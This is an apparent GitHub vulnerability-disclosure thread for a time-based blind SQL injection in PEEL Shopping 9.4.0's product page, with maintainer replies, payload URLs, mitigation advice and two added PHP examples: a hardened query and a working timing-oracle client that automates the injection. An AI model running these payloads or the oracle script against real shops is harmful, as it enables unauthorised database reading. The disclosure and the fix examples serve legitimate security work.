Closed faisalfs10x closed 3 years ago
Thanks.
This was due to a change of structure in how product details are retrieved, in order to potentially link it to a product API instead of reading data from MySQL. The previously implemented protection was no longer active, so it was necessary to add an intval on the GET parameter.
=> Subject closed
So, I noticed you made code changes on this line, right? File produit_details.php. But the bug still affects version 9.3.0 anyway.
The version which can be downloaded on our website is now patched
That's great. Thanks for acknowledging the vulnerability.
Thanks for your remarks.
Vulnerability Name: SQL Injection in the "produit_details.php?id" parameter
Date of Discovery: 10 July 2021
Product version: 9.4.0 (download link)
Author: faisalfs10x
Vulnerability Description: A public user/guest (unauthenticated) can inject a malicious SQL query to alter the execution of the predefined SQL commands via the "id" parameter of the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon a successful SQL injection attack, the attacker can read sensitive data from the database or modify database data.
Vulnerable URL: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]
Proof of Concept:
1) Assuming the out-of-the-box peel-shopping_9_4_0 installation uses the database name peel. This query checks whether DATABASE() is LIKE the hex literal 0x257065656c25 ('%peel%'): it delays for 7 seconds before redirecting to the homepage (http://localhost/peel-shopping_9_4_0/), which indicates the SQL condition evaluated TRUE, i.e. the database name is like "peel".
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
[PoC enum db name]
2) Assuming the site is using a MariaDB database server: this query checks whether VERSION() is LIKE the hex literal 0x254d61726961444225 ('%MariaDB%'); it delays for 5 seconds if TRUE.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
[Poc enum MariaDB]
3) By default, the database has a table named peel_produits. This query checks whether the table peel_produits exists; it delays for 10 seconds if TRUE, else it redirects to the homepage instantly.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
[PoC enum table peel_produits]
To produce a SQL syntax error, it is possible to intercept the request before it redirects to the homepage, using a tool like Burp Suite (Repeater).
Syntax-error payload: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)
[MariaDB disclosed image]
[peel_produits table_name disclosed]
Dump table name = peel_profil
Consequences:
Mitigation: Use prepared statements (with parameterized queries). It would also be good to cast to integer to ensure only numerical data is accepted in the 'id' parameter, e.g. intval($_GET['id']). cc @advisto
Reference for the mitigation: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
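The mitigation above (prepared statements plus an integer cast on `id`) side by side with the vulnerable pattern, as an added example written for this thread; it is not PEEL Shopping's own code. The table name `peel_produits` comes from the report, the column names `nom` and `prix` are assumed, and `mysqli_stmt::get_result()` requires the mysqlnd driver.

```php
<?php
// Added example, not PEEL Shopping's code. Table peel_produits is from the
// report; columns nom/prix are assumed for illustration.
declare(strict_types=1);

// VULNERABLE pattern: the raw GET value is spliced into the SQL text, so a
// value such as (SELECT 1337 FROM (SELECT(SLEEP(7)))FSXX) executes as SQL.
function fetch_product_vulnerable(mysqli $db, string $rawId): ?array
{
    $sql = 'SELECT id, nom, prix FROM peel_produits WHERE id = ' . $rawId;
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Validation: accept only a positive decimal integer. intval() alone maps any
// payload to 0 and "42 OR 1=1" to 42, so reject bad input instead of coercing it.
function parse_product_id(mixed $raw): ?int
{
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// HARDENED pattern: validated integer bound through a prepared statement; the
// value travels as data and is never parsed as SQL, whatever it contains.
function fetch_product_safe(mysqli $db, mixed $rawId): ?array
{
    $id = parse_product_id($rawId);
    if ($id === null) {
        return null; // caller answers 404 / redirects; no query is executed
    }
    $stmt = $db->prepare('SELECT id, nom, prix FROM peel_produits WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// What the cast and the validator do to the report's payload (no DB needed):
$payload = '(SELECT 1337 FROM (SELECT(SLEEP(7-(IF(DATABASE() LIKE 0x257065656c25,0,5)))))FSXX)';
var_dump(intval($payload));              // int(0): the payload never reaches SQL
var_dump(parse_product_id($payload));    // NULL: rejected outright
var_dump(parse_product_id('42'));        // int(42)
var_dump(parse_product_id('42 OR 1=1')); // NULL, whereas intval() would give 42
```

Either the cast or the prepared statement on its own closes this injection; using both means a later refactor that drops one (the situation described in the maintainer's reply, where an earlier protection stopped being active after a restructure) does not silently reopen the hole. Rejecting non-numeric input rather than casting it also avoids running a pointless `id = 0` query on every probe.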
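A small client for the timing oracle used in steps 1 to 3 of the PoC, added here as an example and not part of the original report. It builds the same `SLEEP(delay-(IF(cond,0,5)))` payload shape, encodes the LIKE patterns as hex literals (producing the report's `0x257065656c25` and `0x254d61726961444225`), and decides TRUE/FALSE from the elapsed time. The target URL is the one in the report; the HTTP transport is a swappable callable so the threshold logic can be exercised without a live server.

```php
<?php
// Added example, not PEEL Shopping's code or the reporter's script.
declare(strict_types=1);

const TARGET = 'http://localhost/peel-shopping_9_4_0/achat/produit_details.php';

// MySQL hex literal: lets the payload avoid quote characters entirely.
function hex_literal(string $s): string
{
    return '0x' . bin2hex($s);
}

// Payload shape from the report:
//   (SELECT 1337 FROM (SELECT(SLEEP(delay-(IF(cond,0,5)))))FSXX)
// TRUE  -> SLEEP(delay)
// FALSE -> SLEEP(delay-5), so delay must be at least 5 to keep it non-negative.
function build_payload(string $condition, int $delay): string
{
    if ($delay < 5) {
        throw new InvalidArgumentException('delay must be >= 5 so the FALSE branch does not go negative');
    }
    return sprintf('(SELECT 1337 FROM (SELECT(SLEEP(%d-(IF(%s,0,5)))))FSXX)', $delay, $condition);
}

// Fire one request and return elapsed seconds. $sender is callable(string $url): void;
// the default uses curl and does not follow the app's redirect to the homepage.
function timed_request(string $url, ?callable $sender = null): float
{
    $sender ??= function (string $url): void {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 60);
        curl_exec($ch);
        curl_close($ch);
    };
    $t0 = microtime(true);
    $sender($url);
    return microtime(true) - $t0;
}

// The two branches differ by 5 s, so a threshold 2.5 s below the TRUE delay
// sits halfway between them and tolerates ordinary network jitter.
function oracle(string $condition, int $delay = 7, ?callable $sender = null): bool
{
    $url = TARGET . '?id=' . rawurlencode(build_payload($condition, $delay));
    return timed_request($url, $sender) >= $delay - 2.5;
}

// The three conditions from the PoC.
function poc_conditions(): array
{
    return [
        'DATABASE() like %peel%'         => 'DATABASE() LIKE ' . hex_literal('%peel%'),
        'VERSION() like %MariaDB%'       => 'VERSION() LIKE ' . hex_literal('%MariaDB%'),
        'table peel.peel_produits exists' => 'EXISTS(SELECT 3 FROM peel.peel_produits)',
    ];
}

if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    foreach (poc_conditions() as $label => $cond) {
        printf("%-34s %s\n", $label, oracle($cond) ? 'TRUE' : 'FALSE');
    }
}
```

Note that with these payloads the FALSE branch is not instant: `SLEEP(7-5)`, `SLEEP(5-5)` and `SLEEP(10-5)` sleep 2, 0 and 5 seconds respectively, so classifying on "is it delayed at all" would misread step 3; comparing against a threshold between the two branch delays, as `oracle()` does, avoids that. To check the threshold logic offline, pass a `$sender` that simply calls `usleep()` for the branch delay you want to simulate.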